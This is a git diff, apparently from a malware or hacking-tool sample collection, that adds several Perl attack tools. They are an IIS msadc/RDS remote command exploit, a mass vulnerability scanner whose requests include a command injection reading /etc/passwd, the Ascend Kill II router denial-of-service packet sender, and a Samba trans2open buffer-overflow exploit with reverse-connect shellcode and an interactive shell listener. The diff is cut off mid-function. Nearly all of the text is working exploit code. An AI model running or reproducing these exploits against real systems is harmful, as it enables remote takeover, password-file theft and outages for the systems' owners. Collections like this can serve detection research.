can see progress + foreach $drive (@drives) { + print "$drive: "; # ditto +$reqlen=length( make_req(1,$drive,$dir) ) - 28; +$reqlenlen=length( "$reqlen" ); +$clen= 206 + $reqlenlen + $reqlen; + +my @results=sendraw(make_header() . make_req(1,$drive,$dir)); +if (rdo_success(@results)){print "Success!\n"; + +save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;"); + exit;} +else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} + +############################################################################## + +sub odbc_error { +my (@in)=@_; my $base; +my $base = content_start(@in); +if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this +$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; +$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; +$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; +return $in[$base+4].$in[$base+5].$in[$base+6];} +print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; +print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . + $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} + +############################################################################## + +sub verbose { +my ($in)=@_; +return if !$verbose; +print STDOUT "\n$in\n";} + +############################################################################## + +sub save { +my ($p1)=@_; my $ropt=""; +open(OUT, ">rds.save") || print "Problem saving parameters...\n"; +if (defined $args{c}){ $ropt="c ";} +if (defined $args{V}){ $ropt.="V ";} +if (defined $args{w}){ $ropt.="w ";} +print OUT "v2\n$ip\n$ropt\n$p1\n"; +close OUT;} + +############################################################################## + +sub load { +my ($action)=@_; +my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};"; +open(IN,"<rds.save") || die("Couldn't open rds.save\n"); +@p=<IN>; close(IN); +die("Wrong rds.save version") if $p[0] ne "v2\n"; +$ip="$p[1]"; $ip=~s/\n//g; +$target= inet_aton($ip) || die("inet_aton problems"); +print "Resuming to $ip ..."; +@switches=split(/ /,$p[2]); +foreach $switch (@switches) { + $args{$switch}="1";} + +if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";} +print "Type the command line you want to run ($comm assumed):\n" + . "$comm "; +$in=<STDIN>; chomp $in; +$command="$comm " . $in ; + +$torun="$p[3]"; $torun=~s/\n//g; +if($torun=~/btcustmr/){ + $args{'c'}="1";} # this is a kludge to make it work + +if($torun=~/^dbq/){ $torun=$drvst.$torun; } + +if(run_query("$torun")){ + print "Success!\n";} else { print "failed\n"; } +exit;} + +############################################################################## + +sub create_table { +return 1 if (!defined $args{c}); +return 1 if (defined $args{V}); +my ($in)=@_; +$reqlen=length( make_req(2,$in,"") ) - 28; +$reqlenlen=length( "$reqlen" ); +$clen= 206 + $reqlenlen + $reqlen; +my @results=sendraw(make_header() . make_req(2,$in,"")); +return 1 if rdo_success(@results); +my $temp= odbc_error(@results); verbose($temp); +return 1 if $temp=~/Table 'AZZ' already exists/; +return 0;} + +############################################################################## + +sub known_dsn { +foreach $dSn (@dsns) { + print "."; + next if (!is_access("DSN=$dSn")); + if(create_table("DSN=$dSn")){ + if(run_query("DSN=$dSn")){ + print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";} + +############################################################################## + +sub is_access { +my ($in)=@_; +return 1 if (!defined $args{c}); +return 1 if (defined $args{V}); +$reqlen=length( make_req(5,$in,"") ) - 28; +$reqlenlen=length( "$reqlen" ); +$clen= 206 + $reqlenlen + $reqlen; +my @results=sendraw(make_header() . make_req(5,$in,"")); +my $temp= odbc_error(@results); +verbose($temp); return 1 if ($temp=~/Microsoft Access/); +return 0;} + +############################################################################## + +sub run_query { +my ($in)=@_; my $req; +if (defined $args{c}){$req=3;} else {$req=6;} +$reqlen=length( make_req($req,$in,"") ) - 28; + +$reqlenlen=length( "$reqlen" ); +$clen= 206 + $reqlenlen + $reqlen; +my @results=sendraw(make_header() . make_req($req,$in,"")); +return 1 if rdo_success(@results); +my $temp= odbc_error(@results); verbose($temp); +return 0;} + +############################################################################## + +sub known_mdb { +my @drives=("c","d","e","f","g"); +my @dirs=("winnt","winnt35","winnt351","win","windows"); +my $dir, $drive, $mdb; +my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; + +foreach $drive (@drives) { + foreach $dir (@sysdirs){ + foreach $mdb (@sysmdbs) { + print "."; + if(create_table($drv.$drive.":\\".$dir.$mdb)){ + if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ + print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit; + }}}}} + + foreach $drive (@drives) { + foreach $mdb (@mdbs) { + print "."; + if(create_table($drv.$drive.":".$mdb)){ + if(run_query($drv.$drive.":".$mdb)){ + print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit; + }}}} +} + +############################################################################## + +sub hork_idx { +print "\nAttempting to dump Index Server tables...\n"; +print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; +$reqlen=length( make_req(4,"","") ) - 28; +$reqlenlen=length( "$reqlen" ); +$clen= 206 + $reqlenlen + $reqlen; +my @results=sendraw(make_header() . make_req(4,"","")); +if (rdo_success(@results)){ +my $max=@results; my $c; my %d; +for($c=19; $c<$max; $c++){ + $results[$c]=~s/\x00//g; + $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; + $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; + $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; + $d{"$1$2"}="";} +foreach $c (keys %d){ print "$c\n"; } +} else {print "Index server not installed/query failed\n"; }} + +############################################################################## + +sub dsn_dict { +open(IN, "<$args{e}") || die("Can't open external dictionary\n"); +while(<IN>){ + $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; + next if (!is_access("DSN=$dSn")); + if(create_table("DSN=$dSn")){ + if(run_query("DSN=$dSn")){ + print "Success!\n"; save ("dsn=$dSn"); exit; }}} +print "\n"; close(IN);} + +############################################################################## + +sub content_start { # this will take in the server headers +my (@in)=@_; my $c; +for ($c=1;$c<500;$c++) { # assume there's less than 500 headers + if($in[$c] =~/^\x0d\x0a/){ + if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } + else { return $c+1; }}} +return -1;} # it should never get here actually + +############################################################################## + +sub funky { +my (@in)=@_; my $error=odbc_error(@in); +if($error=~/ADO could not find the specified provider/){ +print "\nServer returned an ADO miscofiguration message\nAborting.\n"; +exit;} +if($error=~/A Handler is required/){ +print "\nServer has custom handler filters (they most likely are patched)\n"; +exit;} +if($error=~/specified Handler has denied Access/){ +print "\nADO handlers denied access (they most likely are patched)\n"; +exit;} +if($error=~/server has denied access/){ +print "\nADO handlers denied access (they most likely are patched)\n"; +exit;}} + +############################################################################## + +sub has_msadc { +my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); +my $base=content_start(@results); +return if($results[$base]=~/Content-Type: application\/x-varg/); +my @s=grep("^Server:",@results); +if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" } +else { print "/msadc/msadcs.dll was not found.\n";} +exit;} + +############################################################################## + +sub use_unc { +$uncpath=$args{u}; +$driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; +if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ + print "Your UNC path sucks. You need the following format:\n". + "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } + +if(create_table($driverline.$uncpath)){ + if(run_query($driverline.$uncpath)){ + print "Success!\n"; save ("dbq=".$uncpath); exit;}} +} + +############################################################################## + +sub get_name { # this was added last minute +my $msadc=<<EOT +POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1 +User-Agent: ACTIVEDATA +Host: $ip +Content-Length: 126 +Connection: Keep-Alive + +ADCClientVersion:01.06 +Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0 + +--!ADM!ROX!YOUR!WORLD!-- +EOT +; $msadc=~s/\n/\r\n/g; +my @results=sendraw($msadc); +my $base=content_start(@results); +$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g; +print "Machine name: $results[$base+6]\n";} + +############################################################################## +# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, +# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and +# good friends!), wiretrip, l0pht, nmrc & all of phrack +# +# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice +# +# I wish I could really name everyone, but I can't. Don't feel slighted if +# your not on the list... :) +############################################################################## diff --git a/Perl/HackTool.Perl.Nrgscan b/Perl/HackTool.Perl.Nrgscan new file mode 100644 index 00000000..dfc28a64 --- /dev/null +++ b/Perl/HackTool.Perl.Nrgscan @@ -0,0 +1,210 @@ + + +@scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n", +"GET /_vti_bin/shtml.dll HTTP/1.0\n\n", +"GET /article.php HTTP/1.0\n\n", +"GET /_vti_bin/shtml.exe HTTP/1.0\n\n", +"GET /msadc/samples/adctest.asp HTTP/1.0\n\n"); + +@names_w = ("/cgi-bin", +"/_vti_bin", +"/article", +"/_vti_bin", +"/Webdist", +"/msadc.pl", +"/RDS"); + + +######### Fast Scan - script must be edited in sub version if it is to be used ########## +@scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n", +"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n", +"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n", +"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n", +"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n", +"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n", +"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n", +"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n", +"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n", +"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n", +"GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n", +"GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n"); +@names_u = ("_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ", +"shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ", +"wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ", +"openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ", +"codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll "); +############################# Above code not used ########################################### + + +############################################################### + $insecure = 0; +system "clear"; +print "\n Energy PHP Fast Scanner \n\n"; +use IO::Socket; +my ($port, $sock,$server); +$size=0; +################################ SCAN ########################## +if(! $ARGV[0]) +{ + &usage; + exit; +} + +$port = $ARGV[2]; +if(! $ARGV[2]) { $port = 80; } + +open (HOSTFILE, "$ARGV[0]"); +@hostfile = <HOSTFILE>; +chop(@hostfile); +$hostlength = @hostfile; +$hostcount = 0; + +while ($hostcount < $hostlength) { + print ("working on @hostfile[$hostcount]...\n"); +$server = (@hostfile[$hostcount]); + &connect; + $hostcount++; + } + + +print "Scanner dropper \n"; + +########################################################## +sub connect { + #print "[Trying $server]\n"; + $sock = IO::Socket::INET->new(PeerAddr => $server, + PeerPort => $port, + Proto => 'tcp'); + if ($sock) { + print "[Connected to $server on $port]\n"; + $n=0; + &version; + close(sock); + $size++; + } else { + + } +} + +########################################################### +sub version { + $ver = "HEAD / HTTP/1.0\n\n"; + my($iaddr,$paddr,$proto); +$iaddr = inet_aton($server) || die "Error: $!"; +$paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; +$proto = getprotobyname('tcp') || die "Error: $!"; +socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!"; +connect(SOCK, $paddr) || die "Error: $!"; +send(SOCK, $ver, 0) || die "Can't to send packet: $!"; + +# I do believe this should be taken out------------------------- +# However unhash below to activate interactive optional deep mode. + +# print "[Server version is]:\n[##############################]\n"; +# while(<SOCK>) +# { +# print; +# } +# print "[##############################]\n"; +# print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:"; +# $n=0; +# chomp($type=<STDIN>); + +# Note if above is unhashed these two lines must be hashed. +$n=0; +$type=1; + + +if($type eq 3) + { print "Scan aborted!\n"; exit; } + if($type eq 1) + { + foreach $scripts_w(@scripts_w) +{ + print "Searching for @names_w[$n] : "; + $scw=$scripts_w; + $name = @names_w[$n]; + &win_scan; + $n++; +} + } + else { + + +foreach $scripts_u(@scripts_u) +{ + print "Searching for [@names_u[$n]] : "; + $sc=$scripts_u; + $name = @names_u[$n]; + &win2_scan; + $n++; +} + } +close(SOCK); +} +################################################################# +sub win_scan { +my($iaddr,$paddr,$proto); +$iaddr = inet_aton($server) || die "Error: $!"; +$paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; +$proto = getprotobyname('tcp') || die "Error: $!"; +socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); +connect(SOCK, $paddr) || &error("Unable to connect: $!"); +send(SOCK,$scw,0); + + $check=<SOCK>; + ($http,$code,$blah) = split(/ /,$check); + if($code == 200) + { + + print "[Found!]\n"; + open (OUT, ">>$ARGV[1]"); + print OUT ("$server - [@names_w[$n]] \n"); + close (OUT); + $insecure++; + } + else + { + print "[Not Found]\n"; + + } + close(SOCK); +} + +############################################################### +sub win2_scan { + + my($iaddr,$paddr,$proto); +$iaddr = inet_aton($server) || die "Error: $!"; +$paddr = sockaddr_in($port, $iaddr) || die "Error: $!"; +$proto = getprotobyname('tcp') || die "Error: $!"; +socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!"); +connect(SOCK, $paddr) || &error("Unable to connect: $!"); +send(SOCK,$sc,0); + + $check=<SOCK>; + ($http,$code,$blah) = split(/ /,$check); + if($code == 200) + { + print "[Found!]\n"; + $insecure++; + } + else + { + print "[Not Found]\n"; + + } + close(SOCK); +} + +################################ USAGE ########################## +sub usage { + system "clear"; + print "\n\n\n Fast Scanner \n\n"; + print " || by Energy || \n\n"; + print "Used to mass scan Windows,IRIX and Linux b0x\n\n"; + print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n"; + exit(0); } +################################ END ########################## +print "[Test $size hosts $port e $insecure sites vulnerable]\n"; + diff --git a/Perl/HackTool.Perl.Small.f b/Perl/HackTool.Perl.Small.f new file mode 100644 index 00000000..bca7b3f1 --- /dev/null +++ b/Perl/HackTool.Perl.Small.f @@ -0,0 +1,57 @@ + +# +# Ascend Kill II - perl version +# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com> +# +# Released: 3/17/98 +# +# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues +# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) +# +# NOTE: This program is NOT to be used for malicous purposes. This is +# intenteded for educational purposes only. By using this program +# you agree to use this for lawfull purposes ONLY. +# +# + +use Socket; + +require "getopts.pl"; + +sub AF_INET {2;} +sub SOCK_DGRAM {2;} + +sub ascend_kill { + $remotehost = shift(@_); + chop($hostname = `hostname`); + $port = 9; + $SIG{'INT'} = 'dokill'; + $sockaddr = 'S n a4 x8'; + ($pname, $aliases, $proto) = getprotobyname('tcp'); + ($pname, $aliases, $port) = getservbyname($port, 'tcp') + unless $port =~ /^\d+$/; + ($pname, $aliases, $ptype, $len, $thisaddr) = + gethostbyname($hostname); + $this = pack($sockaddr, AF_INET, 0, $thisaddr); + ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost); + $that = pack($sockaddr, AF_INET, $port, $thataddr); + socket(S, &AF_INET, &SOCK_DGRAM, 0); + $msg = pack("c64", + 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, + 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, + 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, + 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, + 0x50, 0x41, 0x53, 0x53); + for ($i=0; $i<500; $i++) { + $msg .= pack("c1", 0xff); + } + send(S,$msg,0,$that) || die "send:$!"; +} + +if ($ARGV[0] eq '') { + print "usage: akill2.pl <remote_host>\n"; + exit; +} + +&ascend_kill($ARGV[0]); diff --git a/Perl/HackTool.Perl.TransRoot b/Perl/HackTool.Perl.TransRoot new file mode 100644 index 00000000..6df3e890 --- /dev/null +++ b/Perl/HackTool.Perl.TransRoot @@ -0,0 +1,492 @@ +############### + +##[ Header +# Name: trans2root.pl +# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow) +# CVE: CAN-2003-0201 +# Author: H D Moore <hdmoore@digitaldefense.net> +# Copyright: Copyright (C) 2003 Digital Defense Inc. +# Release Date: April 7, 2003 +# Revision: 1.0 +# Download: http://www.digitaldefense.net/labs/securitytools.html +# Modified: By SARA team to incorporate for sara +## + +use strict; +use Socket; +use IO::Socket; +use IO::Select; +use POSIX; +use Getopt::Std; + +$SIG{USR2} = \&GoAway; + +my %args; +my %targets = +( + "linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86], + "solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86], + "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86], + # name # default # start # end # step # function +); + +getopt('t:M:h:p:r:x:H:P:', \%args); + +my $target_type = $args{t} || Usage(); +my $target_host = $args{h} || Usage(); +my $local_host = $args{H} || Usage(); +my $local_port = $args{P} || 1981; +my $target_port = $args{p} || 139; +my $mode = $args{x} || ""; + +my $target_mode = "brute"; + +if (! exists($targets{$target_type})) { Usage(); } +print "[*] Using target type: $target_type\n"; + +# allow single mode via the -M option +if ($args{M} && uc($args{M}) eq "S") +{ + $target_mode = "single"; +} + +# the parent process listens for an incoming connection +# the child process handles the actual exploitation +my $listen_pid = $$; +my $exploit_pid = StartListener($local_port); + +# get the default return address for single mode +my $targ_ret = $args{r} || $targets{$target_type}->[0]; +my $curr_ret; +$targ_ret = eval($targ_ret); + +if ($target_mode !~ /brute|single/) +{ + print "[*] Invalid attack mode: $target_mode (single or brute only)\n"; + exit(0); +} + + +if ($target_mode eq "single") +{ + $curr_ret = $targ_ret; + if(! $targ_ret) + { + print "[*] Invalid return address specified!\n"; + kill("USR2", $listen_pid); + exit(0); + } + + print "[*] Starting single shot mode...\n"; + printf ("[*] Using return address of 0x%.8x\n", $targ_ret); + my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret); + my $ret = AttemptExploit($target_host, $target_port, $buf); + + sleep(2); + kill("USR2", $listen_pid); + exit(0); +} + + +if ($target_mode eq "brute") +{ + print "[*] Starting brute force mode...\n"; + + for ( + $curr_ret =$targets{$target_type}->[1]; + $curr_ret >= $targets{$target_type}->[2]; + $curr_ret -=$targets{$target_type}->[3] + ) + { + select(STDOUT); $|++; + my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret); + printf (" \r[*] Return Address: 0x%.8x", $curr_ret); + my $ret = AttemptExploit($target_host, $target_port, $buf); + } + sleep(2); + kill("USR2", $listen_pid); + exit(0); +} + +sub Usage { + + print STDERR "\n"; + print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n"; + print STDERR "===========================================================\n\n"; + print STDERR " Usage: \n"; + print STDERR " $0 <options> -t <target type> -H <your ip> -h <target ip>\n"; + print STDERR " Options: \n"; + print STDERR " -M (S|B) <single or brute mode>\n"; + print STDERR " -r <return address for single mode>\n"; + print STDERR " -p <alternate Samba port>\n"; + print STDERR " -P <alternate listener port>\n"; + print STDERR " Targets:\n"; + foreach my $type (keys(%targets)) + { + print STDERR " $type\n"; + } + print STDERR "\n"; + + + exit(1); +} + + +sub StartListener { + my ($local_port) = @_; + my $listen_pid = $$; + + my $s = IO::Socket::INET->new ( + Proto => "tcp", + LocalPort => $local_port, + Type => SOCK_STREAM, + Listen => 3, + ReuseAddr => 1 + ); + + if (! $s) + { + print "[*] Could not start listener: $!\n"; + exit(0); + } + + print "[*] Listener started on port $local_port\n"; + + my $exploit_pid = fork(); + if ($exploit_pid) + { + my $victim; + $SIG{USR2} = \&GoAway; + + while ($victim = $s->accept()) + { + kill("USR2", $exploit_pid); + if ($mode eq "Sara") { + print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n"; + StartShell($victim); + } else { + print "System is vulnerable to attack\n"; + exit(0); + } + } + exit(0); + } + return ($exploit_pid); +} + +sub StartShell { + my ($client) = @_; + my $sel = IO::Select->new(); + + Unblock(*STDIN); + Unblock(*STDOUT); + Unblock($client); + + select($client); $|++; + select(STDIN); $|++; + select(STDOUT); $|++; + + $sel->add($client); + $sel->add(*STDIN); + + print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n"; + print $client "echo \n"; + + while (fileno($client)) + { + my $fd; + my @fds = $sel->can_read(0.2); + + foreach $fd (@fds) + { + my @in = <$fd>; + + if(! scalar(@in)) { next; } + + if (! $fd || ! $client) + { + print "[*] Closing connection.\n"; + close($client); + exit(0); + } + + if ($fd eq $client) + { + print STDOUT join("", @in); + } else { + print $client join("", @in); + } + } + } + close ($client); +} + +sub AttemptExploit { + my ($Host, $Port, $Exploit) = @_; + my $res; + + my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type => SOCK_STREAM, Protocol => "tcp"); + + if (! $s) + { + print "\n[*] Error: could not connect: $!\n"; + kill("USR2", $listen_pid); + exit(0); + } + + select($s); $|++; + select(STDOUT); $|++; + Unblock($s); + + my $SetupSession = + "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01". + "\x00\x00\x00\x00"; + + my $TreeConnect = + "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00". + "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24". + "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50". + "\x43\x24"; + + my $Flush = ("\x00" x 808); + + print $s $SetupSession; + $res = ReadResponse($s); + + print $s $TreeConnect; + $res = ReadResponse($s); + + # uncomment this for diagnostics + # print "[*] Press Enter to Continue...\n"; + # $res = <STDIN>; + + print "[*] Sending Exploit Buffer...\n"; + + print $s $Exploit; + print $s $Flush; + + ReadResponse($s); + close($s); +} + +sub CreateBuffer_linx86 { + my ($Host, $Port, $Return) = @_; + + my $RetAddr = eval($Return); + $RetAddr = pack("l", $RetAddr); + + my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); + $a1 = chr(ord($a1) ^ 0x93); + $a2 = chr(ord($a2) ^ 0x93); + $a3 = chr(ord($a3) ^ 0x93); + $a4 = chr(ord($a4) ^ 0x93); + + my ($p1, $p2) = split(//, reverse(pack("s", $Port))); + $p1 = chr(ord($p1) ^ 0x93); + $p2 = chr(ord($p2) ^ 0x93); + + my $exploit = + # trigger the trans2open overflow + "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". + "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". + + GetNops(772) . + + # xor decoder courtesy of hsj + "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". + "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". + "\x93\x40\xe2\xfa". + + # reverse-connect, mangled lamagra code + fixes + "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b". + "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a". + "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d". + $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4. + "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67". + "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e". + "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b". + "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60". + "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa". + "\xfd\xbc\xe0\xfb". + + GetNops(87). + + ($RetAddr x 8). + + "DDI!". ("\x00" x 277); + + return $exploit; +} + +sub CreateBuffer_solx86 { + my ($Host, $Port, $Return) = @_; + + my $RetAddr = eval($Return); + my $IckAddr = $RetAddr - 512; + + $RetAddr = pack("l", $RetAddr); + $IckAddr = pack("l", $IckAddr); + + # IckAddr needs to point to a writable piece of memory + + my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); + $a1 = chr(ord($a1) ^ 0x93); + $a2 = chr(ord($a2) ^ 0x93); + $a3 = chr(ord($a3) ^ 0x93); + $a4 = chr(ord($a4) ^ 0x93); + + my ($p1, $p2) = split(//, reverse(pack("s", $Port))); + $p1 = chr(ord($p1) ^ 0x93); + $p2 = chr(ord($p2) ^ 0x93); + + my $exploit = + # trigger the trans2open overflow + "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". + "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". + + GetNops(813) . + + # xor decoder courtesy of hsj + "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". + "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". + "\x93\x40\xe2\xfa". + + # reverse-connect, code by bighawk + "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2". + "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb". + $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. + "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a". + "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb". + "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8". + "\x6c\x46". + + GetNops(87) . + + "010101". + $RetAddr. + $IckAddr. + $RetAddr. + $IckAddr. + "101010". + + "DDI!". ("\x00" x 277); + + return $exploit; +} + +sub CreateBuffer_bsdx86 { + my ($Host, $Port, $Return) = @_; + + my $RetAddr = eval($Return); + my $IckAddr = $RetAddr - 512; + + $RetAddr = pack("l", $RetAddr); + $IckAddr = pack("l", $IckAddr); + + # IckAddr needs to point to a writable piece of memory + + my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); + $a1 = chr(ord($a1) ^ 0x93); + $a2 = chr(ord($a2) ^ 0x93); + $a3 = chr(ord($a3) ^ 0x93); 